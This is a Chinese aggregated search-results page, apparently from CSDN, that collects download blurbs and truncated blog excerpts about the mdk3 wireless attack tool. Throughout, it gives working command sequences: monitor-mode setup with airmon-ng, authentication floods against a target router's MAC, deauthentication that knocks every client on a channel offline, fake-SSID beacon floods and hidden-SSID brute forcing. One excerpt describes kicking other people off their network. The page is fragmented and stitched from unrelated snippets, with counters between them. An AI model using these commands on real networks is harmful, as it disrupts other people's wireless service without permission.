精华内容
下载资源
问答
  • MDK3入门

    2011-11-30 14:41:43
    MDK3入门
  • mdk3教程PDF

    2014-06-07 13:54:42
    mdk3教程PDF
  • 此版本的 MDK3 具有一项新功能,可将带有无效 SSID 字符的定向探测请求发送到 AP。 希望是,如果发送了足够多的探测,AP 将锁定并重新启动。 此工具仅应用于试验您自己的无线网络的安全性。 #安装 cd /mdk3-...
  • Mdk3中文简介

    2011-12-15 14:49:09
    Mdk3中文简介 无线攻击软件。。。linux专用。。
  • 此为mdk3源码,复制到linux系统直接make即可,wifi攻击工具,实测好用
  • Realview MDK3下进行mini2440裸机开发 Realview MDK3下进行mini2440裸机开发
  • 此资源为编译好的mdk3工具,免去一部分人不会编译成在linux开发板上运行的烦恼,在linux开发板上直接就可以运行,复制到linux开发板上加上可执行权限即可,实测在linux4.1.15,cpu为A7的开发板上完美运行
  • mdk3攻击实例

    千次阅读 2017-02-15 08:31:00
    Authentication Flood,mdk3下参数为a: mdk3 mon0 a –a AP的MAC地址(BSSID) -c来对指定的频道进行攻击 -a固定bssid进行攻击 -s控制发包速率。一般默认的是200个包/秒 mdk3 mon0 d -s参数来加快发包速率 -w(白名单...


    Authentication Flood,mdk3下参数为a:
    mdk3 mon0 a –a AP的MAC地址(BSSID)
    -c来对指定的频道进行攻击
    -a固定bssid进行攻击
    -s控制发包速率。一般默认的是200个包/秒


    mdk3 mon0 d
    -s参数来加快发包速率
    -w(白名单)
    –b(黑名单)来添加我们的mac地址
    这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响,而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里。


    动虚假AP信号进行干扰:
    mdk3 mon0 b –g –c 11 –h 7


    对指定的网络发动:
    mdk3 mon0 b –n ESSID –g –c 11
    -g是伪装为54M的标准的802.11无线网络
    -c频道

    转载于:https://www.cnblogs.com/itholidaycn/p/6399930.html

    展开全文
  • keil MDK s3c2440 按键 中断 led 蜂鸣器
  • 无线(wifi)拒绝服务攻击(DOS),linux下mdk3安装包和使用方法文档。自己总结,亲试。
  • 一个cdlinux的iso文件,可以破解无线wifi,自带mdk3工具,使用容易,直接在虚拟机上安装即可使用
  • WIFI MDK3攻击笔记

    2019-10-08 13:03:46
    airmon-ng start wlan0将网卡转换为监听...mdk3 wlan0mon a -a E4:D3:32:8C:B3:AA Authentication DoS:(洪水攻击,又叫做身份验证攻击)这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向...

    airmon-ng start wlan0     将网卡转换为监听模式

    airodump-ng wlan0mon  查找附近无线网络

     

     

     

     

    mdk3 wlan0mon a -a E4:D3:32:8C:B3:AA 

     

    Authentication DoS:(洪水攻击,又叫做身份验证攻击 
    这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应;这个模式常见的使用是在reaver穷据路由PIN码,当遇到AP被“pin死”时,可以用这个模式来直接让AP停止正常响应,迫使AP主人重启路由!

    mdk3 mon0 a
          -a               #测试指定BSSID
          -m              #使用有效数据库中的客户端mac地址
          -c          #对应 -a ,不检查是否测试成功
          -i             #对指定BSSID进行智能攻击
          -s                #速率,默认50

     

     

     

     

    上面一条命令会循环发送大量验证信息给AP,过不了几分钟,AP就会卡死, 如果路由器有防DOS的功能的话,这个不好用

    经过测试 一般等几分钟 wifi就会断开,在手机wifi列表里都找不到,如果停止攻击的话  wifi列表继续出现。

     

     

     

     

    mdk3 wlan0mon d -c 11  攻击指定的频道, 让频道为 11 所有计算机都掉线

    经过测试 所有11的频道的wifi都没有出现在wifi列表  ,停止攻击后,我的HE-503 wifi 依然要等一分钟左右才能连接上

     

     

    Deauthentication/Disassociation Amok
    这个模式看名称就知道大概了:强制解除验证解除连接!在这个模式下,软件会向周围所有可见AP发起循环攻击......可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

    mdk3 mon0 d
          -w              #白名单mac地址列表文件
          -b               #黑名单mac地址列表文件
          -s                         #速率,这个模式下默认无限制
          -c [chan,chan,chan,...]                  #信道,可以多填,如 2,4,5,1

     

     

     

    beacon flood mode

         这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。
    详细命令如下:

    mdk3 mon0 b 

          -n         #自定义ESSID
          -f             #读取ESSID列表文件
          -v            #自定义ESSID和BSSID对应列表文件
          -d         #自定义为Ad-Hoc模式
          -w         #自定义为wep模式
          -g           #54Mbit模式
          -t            # WPA TKIP encryption
          -a           #WPA AES encryption
          -m          #读取数据库的mac地址
           -c                    #自定义信道
           -s                 #发包速率

    mdk3 --help b  #查看详细内容

     

    mdk3 wlan0mon b -n 123456789  创建一个123456789的wifi

     

     

     

     

     

     

     

     

     

    mdk3 wlan0mon b -f wifi.txt –t –c 6 –s 80

    mdk3 wlan0mon b -f wifi.txt

    创建自定义文本里的wifi

    用其他手机可以看到产生大量wifi,不知道为什么我的小米手机看不到。。。。 经过测试没有问题,中文可以正常显示。

     

     

     

     

     

     

    mdk3 wlan0mon b -g -c 11 -h 7 创建一大堆乱码wifi

     

     

     

    转载于:https://www.cnblogs.com/Sendige/p/10192890.html

    展开全文
  • PIN死循环解决方法及mdk3攻击模式详解
  • mdk3加minidwep实现1min内急速抓包
  • 无线攻击之mdk3

    2017-06-11 14:10:00
    mdk3 <interface> <test_mode> [test_options] b 发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃。 -n <ssid> 指定ssid,否则随机生产。 -f <file...
    mdk3 <interface> <test_mode> [test_options]
    • b   发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃。
    • -n <ssid> 指定ssid,否则随机生产。
    • -f <filename>从文件中读取ssid。
    • -v <filename>从文件在读取Mac地址和ssid。
    • -d 显示站点为点对点( Ad-Hoc)。
    • -w 设置为wep加密模式。
    • -g 显示站点为54 Mbit。
    • -t 显示站点为wpa TKIP加密。
    • -a 显示站点为wpe AES加密。
    • -m 使用OUI数据库的有效MAC地址。
    • -h AP是伪造则信道跳动,便于测试某些设备和驱动程序,但是信道跳动降低了分组速率。
    • -c <chan> 在此信道伪造AP,如果你想要你的网卡也跳到这个信道则必须设置-h。
    • -s <pps> 每秒发包速率 默认为50.
    • a 身份验证DoS攻击。
    • -a <ap_mac> 只攻击指定MAC AP。
    • -m 使用OUI数据库的有效MAC地址。
    • -c 不检测是否成功。
    • -i <ap_mac> 在AP上智能测试,-a和-c选项将忽略。
    • -s <pps> 发包率 默认不限制。
    • p 基本侦测和ESSID穷举。
    • -e <ssid> 指定ssid
    • -f <filename> 从文件读取ssid并且BF算法匹配隐藏的ssid(BF=brute force)。
    • -t <bssid> 设置目标AP的MAC地址。
    • -s <pps> 发包率,默认无限制,BF为300
    • -b <character set> 字符集,使用完整的BF模式(建议仅使用short SSIDs)。
    • d 解除认证,把连接AP的每个人都踢掉。
    • -w <filename> 白名单MAC地址文件,免受攻击。
    • -b <filename> 黑名单MAC地址文件,攻击对象。
    • -s <pps> 发包率,默认不限制。
    • -c [chan,chan,chan,...] 信道跳动,没5秒一次。
    • m  Michael shutdown ,连续取消所有流量。
    •  -t <bssid>设置目标AP的MAC地址。
    • -w <seconds> 每次爆破间隔时间,默认10。
    • -n <ppb> 每次爆破发送包,默认70。
    • -j 使用新的TKIP Qos-Exploit 仅需要几个包就可以关闭AP。
    • -s <pps> 发包率,默认400。
    • x 802.1x测试。

    0 基于洪水测试

    • -n <ssid>
    • -t <bssid>
    • -w <WPA type> 设置WPA类型 (1: WPA, 2: WPA2/RSN; default: WPA)
    • -u <unicast cipher> 设置单播类型(1: TKIP, 2: CCMP; default: TKIP)
    • -m <multicast cipher>设置组播类型(1: TKIP, 2: CCMP; default: TKIP)
    • -s <pps> 默认400

    1 基于注销测

    • -t <bssid>
    • -c <bssid>
    • -s <pps> 默认400
    • w WIDS/WIPS/WDS多认证搅乱路由表。
    • -e <SSID>
    • -c [chan,chan,chan...]
    • -z 激活Zero_Chaos' WIDS开发。
    • f MAC地址过滤暴力破解。对已知的客户端MAC地址尝试在动态变化时对给定AP进行身份验证
    •  -t <bssid>
    • -m <mac> 设置MAC地址使用范围(3 bytes, i.e. 00:12:34)没有-m选项将使用内部数据库
    • -f <mac> 设置MAC地址的开始,-f和-m不能同时使用。
    • g WPA降级测试,不验证站点和AP发送WPA加密的数据包,尝试设置为WPE加密或者不加密,mdk3会让WPE或者未加密的客户端工作。所以不能认定为WPA是不好的。可以集合社工的方式。
    •   -t <bssid>

    用例

    ##mdk3 源码地址git://git.kali.org/packages/mdk3.git
    #开始监听无线网卡
    airmon-ng start wlan0
    #扫描APxinxi
    airodump-ng mon0
    #发射伪造AP
    mdk3 mon0 d -n test_mdk3 -a -m -c 11
    #身份验证攻击
    mdk3 mon0 a -a D4:A1:48:EB:75:B4
    #踢出链接附近AP的所有人
    mdk3 mon0 d -s 1000 -c 11
    
    

     

    转载于:https://my.oschina.net/pirtt/blog/918707

    展开全文
  • mdk3洪水攻击:此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。...
  • CDlinux中mdk3攻击模式的详解 无线 上网
  • mdk3洪水攻击教程

    千次阅读 2015-09-15 14:49:00
    使得路由器崩溃,直到重启。 1.iwconfig 查看网卡 2.airmon-ng start wlan0 开启网卡监控 ...3.airodump-ng mon0 ...4.mdk3 mon0 a -a MAC 攻击 转载于:https://www.cnblogs.com/yaolei/p/4810267.html...

    使得路由器崩溃,直到重启。

    1.iwconfig

    查看网卡

    2.airmon-ng start wlan0

    开启网卡监控

    3.airodump-ng mon0

    查看附近路由信息

    4.mdk3 mon0 a -a MAC

    攻击

    转载于:https://www.cnblogs.com/yaolei/p/4810267.html

    展开全文
  • Network-Attacker 是一个基于Mdk3 [Beacon Flooding&Deauthentication Attack]的Wifi压力测试Bash脚本程序
  • 创建恶意无线热点--Mdk3

    千次阅读 2018-04-20 22:32:20
    kali的一个工具--mdk3mdk3 "网卡" b -n "wifi名称" -c 1 -s 200 -a例:mdk3 wlan0 b -n test -c 1 -s 200 -ab beacon泛洪攻击-f 指定wifi名称的文件夹-n 加上wifi名称-w Fake WEP encrypted ...
  • 先将网卡设置为监听模式。 airmon-ng start wlan0 扫描附近无线网络,找出隐藏SSID的AP。 airodump-ng wlan0mon ...mdk3 wlan0mon p -b a -t MAC地址 -s 100 这里我们已经...
  • kali系统下的MDK3攻击

    万次阅读 2017-01-05 15:55:01
     mdk3 mon0 a  -a #测试指定BSSID  -m #使用有效数据库中的客户端mac地址  -c #对应 -a ,不检查是否测试成功  -i #对指定BSSID进行智能攻击  -s #速率,默认50 #测试似乎没有什么效果 mdk3 wlan0mon a
  • 无线网络攻击之mdk3泛洪攻击

    万次阅读 2018-03-07 17:25:09
    原文地址:无线网络攻击之mdk3泛洪攻击作者:secer 原文地址:http://blog.sina.com.cn/s/blog_c19382720101do8n.html 攻击说明:  利用mdk3攻击工具对无线网络中的路由器就行泛洪攻击,踢掉...
  • 收集来自网络上的有关mdk3的一些使用方法以及技巧(持续更新) b beacon泛洪攻击 -f 指定wifi名称的文件夹 -n 加上wifi名称 -w Fake WEP encrypted stations 设置假的加密wep -g Fake 802.11b ...
  • mdk3的用法

    2014-04-07 15:26:42
    还是要让我写,我只是下个东西而已,干嘛要这样
  •  2:需要mdk3mdk3这个软件需要通过apt安装, 需要kali系统的源  3:需要安装aircrack-ng套件  今天这套东西,可以在未连接上靶机网络的情况下,把别人的机器踢掉线  验证洪水攻击 / Authentication Flood ...
  • MDK3是?  MDK3 是一款无线DOS 攻击测试工具,能够发起Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,另外它还具有针对隐藏ESSID 的暴力探测模式、802.1X 渗透测试等功能 ...
  • 使用Kali MDK3无线攻击

    千次阅读 多人点赞 2019-10-07 13:33:08
    mdk3 <接口> <测试_模块> [测试选项] 例:mdk3 --wlan0mon b (通过mdk3 使用网卡接口调用b类测试模块发起攻击) 请注意该mdk3软件在使用时必须打开网卡捕获功能可以打开一个命令窗口输入 airmon-ng start wlan0 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 29,341
精华内容 11,736
关键字:

mdk3